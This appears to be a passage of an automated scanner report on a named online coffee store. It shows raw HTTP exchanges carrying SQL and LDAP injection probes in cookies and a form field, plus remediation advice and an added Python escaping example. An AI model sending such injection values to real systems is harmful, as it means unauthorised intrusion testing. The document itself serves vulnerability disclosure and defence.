HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20694
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSCDCCADA=IIKAELCBBBIFLHKHKJDODFIM; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:32:01 GMT

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" content="Starbucks Store">
       <meta name="keywords" content="starbucks, coffee">
       
       <script src="/include/LibJavaScript.js" type="text/javascript"></script>



<title>Contact Us - StarbucksStore.com</title>
<script language="JavaScript1.2" type="text/javascript"><!--    
   function CheckInput(form)
   {
       var passed = true;
       if (form.cboSubjects){
           if (form.cboSubjects.selectedIndex==0){
               alert("Please select a subject and topic for your email.");
               passed = false;
           }
       }
       return passed;
   }
           
   //-->
</script>        

<script LANGUAGE="JavaScript" SRC="guestassist_jscript.js"></script>


</head>    
<body onload="Page_OnLoad()">
<div id="omniture">

<!-- SiteCatalyst code version: G.6.Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com --><script language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */
   var s_pageName="/guestassist/shcontus.asp"
   var s_setRef=""
   var s_server="10.11.5.101"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/shcontus.asp"
   var s_prop3="SBPTPAHP1SHTB"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/shcontus.asp?error=noselection"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""
   var s_zip=""
   var s_events=""
   var s_products=""
   var s_purchaseID=""
   var s_eVar1=""
   var s_eVar2=""
   var s_eVar3=""
   var s_eVar4=""
   var s_eVar5=""
   var s_eVar6=""
   var s_eVar7=""
   var s_eVar8=""
   var s_eVar9=""
   var s_eVar10=""
   
   var strURL = new String(
...[SNIP]...

Request 2

GET /guestassist/shcontus.asp?error=noselection HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp?error=noselection
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK'%20and%201%3d2--%20; ASPSESSIONIDACACCDBA=LNFLDLCBOHDNPNFKEGCPKHPK; ASPSESSIONIDCABCBCAB=JKFLDLCBMLMOMLJLKGKMLOEI

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20694
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAADCCCB=NIJAELCBNKJDJPDBHKGHDDEA; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:32:02 GMT

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" content="Starbucks Store">
       <meta name="keywords" content="starbucks, coffee">
       
       <script src="/include/LibJavaScript.js" type="text/javascript"></script>



<title>Contact Us - StarbucksStore.com</title>
<script language="JavaScript1.2" type="text/javascript"><!--    
   function CheckInput(form)
   {
       var passed = true;
       if (form.cboSubjects){
           if (form.cboSubjects.selectedIndex==0){
               alert("Please select a subject and topic for your email.");
               passed = false;
           }
       }
       return passed;
   }
           
   //-->
</script>        

<script LANGUAGE="JavaScript" SRC="guestassist_jscript.js"></script>


</head>    
<body onload="Page_OnLoad()">
<div id="omniture">

<!-- SiteCatalyst code version: G.6.Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com --><script language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */
   var s_pageName="/guestassist/shcontus.asp"
   var s_setRef=""
   var s_server="10.11.5.101"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/shcontus.asp"
   var s_prop3="SBPTPAHP1SHTB"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/shcontus.asp?error=noselection"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""
   var s_zip=""
   var s_events=""
   var s_products=""
   var s_purchaseID=""
   var s_eVar1=""
   var s_eVar2=""
   var s_eVar3=""
   var s_eVar4=""
   var s_eVar5=""
   var s_eVar6=""
   var s_eVar7=""
   var s_eVar8=""
   var s_eVar9=""
   var s_eVar10=""
   
   var strURL = new String(
...[SNIP]...

2. LDAP injection
There are 4 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://www.starbucksstore.com/ [ASPSESSIONIDACABBACA cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /

Issue detail

The ASPSESSIONIDACABBACA cookie appears to be vulnerable to LDAP injection attacks.

The payloads b04135e4d2d6b331)(sn=* and b04135e4d2d6b331)!(sn=* were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.
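Why this pair of payloads is informative, with an added example that is not part of the scanner output: inside a disjunction, )(sn=* closes the current assertion and appends a presence filter, which is still a well-formed filter that now matches every entry with an sn attribute, whereas )!(sn=* leaves a bare ! where the parser expects ( or ), so the directory rejects the filter. A page that behaves differently for the two is therefore doing something with the cookie that a plain string comparison would not. The Python below builds an assumed lookup of the form (|(uid=VALUE)(mail=VALUE)) (the report does not show the real query), parses the result with a small RFC 4515 subset parser to show which payload stays well formed, and then applies RFC 4515 escaping and the allowlist check the remediation section recommends.

```python
"""
What the two LDAP probes in 2.1 do to a filter, and how escaping stops it.

Added example; not part of the Burp output. The disjunctive lookup
(|(uid=VALUE)(mail=VALUE)) is an assumed shape chosen to match the
"disjunctive LDAP query" wording of the finding. The parser covers a subset
of the RFC 4515 grammar (and/or/not plus attribute=value items), enough to
show which payload stays well formed and which does not.
"""
import re

ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """RFC 4515 escaping for an assertion value used inside a search filter."""
    return "".join(ESCAPES.get(ch, ch) for ch in value)


def allowed_identifier(value: str) -> bool:
    """Stricter option from the remediation advice: short alphanumerics only."""
    return re.fullmatch(r"[A-Za-z0-9]{1,64}", value) is not None


def unsafe_filter(value: str) -> str:
    """Assumed vulnerable construction: the value is pasted in verbatim."""
    return "(|(uid=%s)(mail=%s))" % (value, value)


def safe_filter(value: str) -> str:
    """Same query with the value escaped, so it can only ever be data."""
    v = escape_filter_value(value)
    return "(|(uid=%s)(mail=%s))" % (v, v)


def parse_filter(text: str):
    """Parse a filter into nested lists, or raise ValueError if malformed.
    ['|', ...] / ['&', ...] / ['!', f] for the operators, ['=', attr, value]
    for items; escape sequences in values are left as written."""
    pos = 0

    def expect(ch):
        nonlocal pos
        if text[pos:pos + 1] != ch:
            raise ValueError("expected %r at offset %d" % (ch, pos))
        pos += 1

    def filt():
        nonlocal pos
        expect("(")
        head = text[pos:pos + 1]
        if head in ("&", "|"):
            pos += 1
            parts = []
            while text[pos:pos + 1] == "(":
                parts.append(filt())
            if not parts:
                raise ValueError("empty filter list at offset %d" % pos)
            node = [head] + parts
        elif head == "!":
            pos += 1
            node = ["!", filt()]
        else:
            end = text.find(")", pos)
            if end < 0 or "(" in text[pos:end] or "=" not in text[pos:end]:
                raise ValueError("bad item at offset %d" % pos)
            attr, value = text[pos:end].split("=", 1)
            node = ["=", attr, value]
            pos = end
        expect(")")
        return node

    node = filt()
    if pos != len(text):
        raise ValueError("trailing data at offset %d" % pos)
    return node


def is_well_formed(text: str) -> bool:
    try:
        parse_filter(text)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for payload in ("b04135e4d2d6b331)(sn=*", "b04135e4d2d6b331)!(sn=*"):
        for build in (unsafe_filter, safe_filter):
            f = build(payload)
            print("%-13s %-62s %s" % (build.__name__, f,
                  parse_filter(f) if is_well_formed(f) else "MALFORMED"))
```

With the unsafe builder the first payload parses into an OR of four assertions, two of them the injected (sn=*), and the second payload does not parse at all; with escaping both payloads become two ordinary equality assertions whose values merely contain \29, \28 and \2a. For a value that is supposed to be a session identifier, the allowlist check is the simpler fix: neither payload passes it.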

Request 1

GET / HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=b04135e4d2d6b331)(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21174
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:30 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="Find every Starbucks Coffee at the Official Online Store.">
   <meta name="keywords" content="Coffee, Starbucks Coffee, whole bean coffee, ground coffee, decaffeinated coffee, instant coffee, VIA,Tazo tea">
   

   <script src="/include/LibJavaScript.js" type="text/javascript"></script>
<title>
Starbucks Coffee - Coffee Beans, Espresso Pods, VIA, and House Blend at Starbucks Store
</title>

</head>    
<body id="home">
<div id="omniture">

</div>
   <div id="container">
       <div id="header">
<h1><a id="logo" href="http://www.starbucksstore.com/">Starbucks Store</a></h1>
<ul id="utilities">
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>.</li>
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>.</li>
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a></li>
</ul>
<div id="locator">
<div class="accountlinks"><a href="http://www.starbucksstore.com/mya/links.asp">My Account</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/shopping">Cart</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/mya/track.asp">Order Status</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/guestassist/shcontus.asp">Help</a></div>
<h2><label for="txtLocation"><b>Search the Starbucks Store</b></label></h2>
<form method="get" action="http://www.starbucksstore.com/products/include/SearchNav.asp" name="searchform">
<input type="hidden" name="search" value="Products">
<table><tr><td><input name="keywords" value="keyword or item#" id="txtLocation" size="29" style="height: 22" ONFOCUS="javascript:ClearTextBox(document.searchform.keywords,'keyword or item#');">
</td><td style="
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=b04135e4d2d6b331)!(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21174
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACABBACA=HOJMDLCBHPPELAMPENAAECCJ; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:30 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="Find every Starbucks Coffee at the Official Online Store.">
   <meta name="keywords" content="Coffee, Starbucks Coffee, whole bean coffee, ground coffee, decaffeinated coffee, instant coffee, VIA,Tazo tea">
   

   <script src="/include/LibJavaScript.js" type="text/javascript"></script>
<title>
Starbucks Coffee - Coffee Beans, Espresso Pods, VIA, and House Blend at Starbucks Store
</title>

</head>    
<body id="home">
<div id="omniture">

</div>
   <div id="container">
       <div id="header">
<h1><a id="logo" href="http://www.starbucksstore.com/">Starbucks Store</a></h1>
<ul id="utilities">
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>.</li>
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>.</li>
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a></li>
</ul>
<div id="locator">
<div class="accountlinks"><a href="http://www.starbucksstore.com/mya/links.asp">My Account</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/shopping">Cart</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/mya/track.asp">Order Status</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/guestassist/shcontus.asp">Help</a></div>
<h2><label for="txtLocation"><b>Search the Starbucks Store</b></label></h2>
<form method="get" action="http://www.starbucksstore.com/products/include/SearchNav.asp" name="searchform">
<input type="hidden" name="search" value="Products">
<table><tr><td><input name="keywords" value="keyword or item#" id="txtLocation" size="29" style="height: 22" ONFOCUS="javascript:ClearTextBox(do
...[SNIP]...

2.2. http://www.starbucksstore.com/aff/adredir.asp [ASPSESSIONIDACABBACA cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The ASPSESSIONIDACABBACA cookie appears to be vulnerable to LDAP injection attacks.

The payloads 1a18fdd9ce30786c)(sn=* and 1a18fdd9ce30786c)!(sn=* were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=1a18fdd9ce30786c)(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 1

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 351
Content-Type: text/html
Location: /products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHTUM; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACABBACA=HCKMDLCBEBEEIOJHOPIJIEII; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:39 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE&amp;CCAID=SBPTPAHP1SHTUM&amp;Redir=/products/shprodli.asp?DeptNo=8100&amp;amp;ClassNo=0035&amp;amp;SubClassNo=0262&amp;amp;cpnum=DRINKWARE">here</a>.</body>

Request 2

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=1a18fdd9ce30786c)!(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 2

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 351
Content-Type: text/html
Location: /products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHTUM; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:39 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE&amp;CCAID=SBPTPAHP1SHTUM&amp;Redir=/products/shprodli.asp?DeptNo=8100&amp;amp;ClassNo=0035&amp;amp;SubClassNo=0262&amp;amp;cpnum=DRINKWARE">here</a>.</body>

2.3. http://www.starbucksstore.com/coffee-machines/ [ASPSESSIONIDCCDDADAA cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /coffee-machines/

Issue detail

The ASPSESSIONIDCCDDADAA cookie appears to be vulnerable to LDAP injection attacks.

The payloads c20c2704323c6dbe)(sn=* and c20c2704323c6dbe)!(sn=* were each submitted in the ASPSESSIONIDCCDDADAA cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /coffee-machines/?CCAID=SBPTPAHPODEA HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=c20c2704323c6dbe)(sn=*; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21102
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHPODEA; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCDDADAA=GJHKDLCBKFNCFHEOPBDCFKDD; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:35 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" content="Shop for Coffee Machines, Espresso Machines and more at Starbucks Store">
       <meta name="keywords" content="coffee machines, espresso machines">    

       <script src="/include/LibJavaScript.js" type="text/javascript"></script>
       <title>Coffee Machines at Starbucks Store</title>

</head>    
<body id="equipment">
<div id="omniture">

</div>
   <div id="container">
       <div id="header">
<h1><a id="logo" href="http://www.starbucksstore.com/">Starbucks Store</a></h1>
<ul id="utilities">
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>.</li>
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>.</li>
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a></li>
</ul>
<div id="locator">
<div class="accountlinks"><a href="http://www.starbucksstore.com/mya/links.asp">My Account</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/shopping">Cart</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/mya/track.asp">Order Status</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/guestassist/shcontus.asp">Help</a></div>
<h2><label for="txtLocation"><b>Search the Starbucks Store</b></label></h2>
<form method="get" action="http://www.starbucksstore.com/products/include/SearchNav.asp" name="searchform">
<input type="hidden" name="search" value="Products">
<table><tr><td><input name="keywords" value="keyword or item#" id="txtLocation" size="29" style="height: 22" ONFOCUS="java
...[SNIP]...

Request 2

GET /coffee-machines/?CCAID=SBPTPAHPODEA HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=c20c2704323c6dbe)!(sn=*; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21102
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHPODEA; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:35 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" content="Shop for Coffee Machines, Espresso Machines and more at Starbucks Store">
       <meta name="keywords" content="coffee machines, espresso machines">    

       <script src="/include/LibJavaScript.js" type="text/javascript"></script>
       <title>Coffee Machines at Starbucks Store</title>

</head>    
<body id="equipment">
<div id="omniture">

</div>
   <div id="container">
       <div id="header">
<h1><a id="logo" href="http://www.starbucksstore.com/">Starbucks Store</a></h1>
<ul id="utilities">
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>.</li>
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>.</li>
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a></li>
</ul>
<div id="locator">
<div class="accountlinks"><a href="http://www.starbucksstore.com/mya/links.asp">My Account</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/shopping">Cart</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/mya/track.asp">Order Status</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/guestassist/shcontus.asp">Help</a></div>
<h2><label for="txtLocation"><b>Search the Starbucks Store</b></label></h2>
<form method="get" action="http://www.starbucksstore.com/products/include/SearchNav.asp" name="searchform">
<input type="hidden" name="search" value="Products">
<table><tr><td><input name="keywords" value="keyword or item#" id="txtLocation" size="29" style="height: 22" ONFOCUS="javascript:ClearTextBox(document.searchform.keywords,'keyword or item#'
...[SNIP]...

2.4. http://www.starbucksstore.com/guestassist/shgaform.asp [EMail.x parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /guestassist/shgaform.asp

Issue detail

The EMail.x parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the EMail.x parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

POST /guestassist/shgaform.asp HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDACACCDBA=LNFLDLCBOHDNPNFKEGCPKHPK
Content-Length: 54

cboSubjects=1000&cboSubTopics=100&EMail.x=*)(sn=*&EMail.y=7

Response 1

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 164
Content-Type: text/html
Location: /guestassist/shcontus.asp?error=noselection
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAADCCCB=MPCAELCBIKHIIOECBLPILHFA; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:24:51 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/guestassist/shcontus.asp?error=noselection">here</a>.</body>

Request 2

POST /guestassist/shgaform.asp HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
